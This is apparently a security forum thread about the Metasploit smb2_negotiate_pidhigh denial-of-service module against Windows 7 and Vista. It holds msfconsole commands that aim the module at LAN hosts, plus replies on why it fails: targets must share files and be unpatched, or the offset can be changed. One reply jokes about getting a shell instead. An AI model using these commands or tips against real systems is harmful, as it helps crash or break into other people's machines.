Metasploit latest video_smb2_negotiate_pidhigh_windows 7(dos) 4 X Security Team

[mzer0]

Exploit code for a remote reboot flaw in Microsoft’s implementation of the SMB2 protocol has been posted on the internet, exposing users of Windows 7 and Windows Vista to the teardrop attacks that used to be popular on Windows 3.1 and Windows 95.

Home Page:

4xsecurityteam(dot)blogspot(dot)com

4xunderground(dot)blogspot(dot)com

vimeo.com/channels/4xsecurityteam

thak&

[Kold_Madness]

hi guys, i have a question, ims testing this auxiliare, but isnt working for me, , my machine doesnt reboot, in the console just show this, and i didnt try in one of my machines, i test it in 3, thats what happens :

Targeting host 192.168.1.6:445...
[-] Auxiliary failed: Rex::ConnectionTimeout The connection timed out (192.168.1.6:445).
Sending request and waiting for a reply...
msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.3
RHOST => 192.168.1.3
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
RPORT => 445
msf auxiliary(smb2_negotiate_pidhigh) > run[*] Response received: "\x00\x00\x00\x9E\xFESMB@\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00A\x00\x01\x00\x02\x02\x00\x00\x8Dm\x8E\ xEEc#}B\xA3b\x1D\x03\xB4\xC4%\x99\x01\x00\x00\x00\ x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x8 B\x06_\xC6\rX\xCA\x01\xFBX+[\xAEW\xCA\x01\x80\x00\x1E\x00 LM `\x1C\x06\x06+\x06\x01\x05\x05\x02\xA0\x120\x10\xA 0\x0E0\f\x06\n+\x06\x01\x04\x01\x827\x02\x02\n"[*] Auxiliary module execution completed

Does anybody could give me a ideia whats going on??

Hi guys, i see that theres no thread about this particular question, i tried to execute and run the auxiliare smb2_negotiate_pdhigh in my other 3 computer in my network, but it doesnt excute it, cause myb machiens dont reboot, i have the ports that are suposed to be open to be done, here is the code what it happen:


Targeting host 192.168.1.6:445...
[-] Auxiliary failed: Rex::ConnectionTimeout The connection timed out (192.168.1.6:445).
Sending request and waiting for a reply...
msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.3
RHOST => 192.168.1.3
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
RPORT => 445
msf auxiliary(smb2_negotiate_pidhigh) > run[*] Response received: "\x00\x00\x00\x9E\xFESMB@\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00A\x00\x01\x00\x02\x02\x00\x00\x8Dm\x8E\ xEEc#}B\xA3b\x1D\x03\xB4\xC4%\x99\x01\x00\x00\x00\ x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x8 B\x06_\xC6\rX\xCA\x01\xFBX+[\xAEW\xCA\x01\x80\x00\x1E\x00 LM `\x1C\x06\x06+\x06\x01\x05\x05\x02\xA0\x120\x10\xA 0\x0E0\f\x06\n+\x06\x01\x04\x01\x827\x02\x02\n"[*] Auxiliary module execution completed

Hope that someone have an ideia that what its going on

[archangel.amael]

Edit your posts using the Edit button located at the bottom right hand side of said post. Re-read the rules that you agreed to when you signed up.
This is your one and only warning.

Furthermore there is no reason to make multiple posts on the same subject.

[vvpalin]

post above yours makes my eyes hurt lol

Its not enough just to have the port open btw .. you have to be sharing something & it needs to be unpatched.

If you meet both of those conditions you could either try the other dos, or possibly change the offset.

Regardless tho why pull a dos when you can pull a shell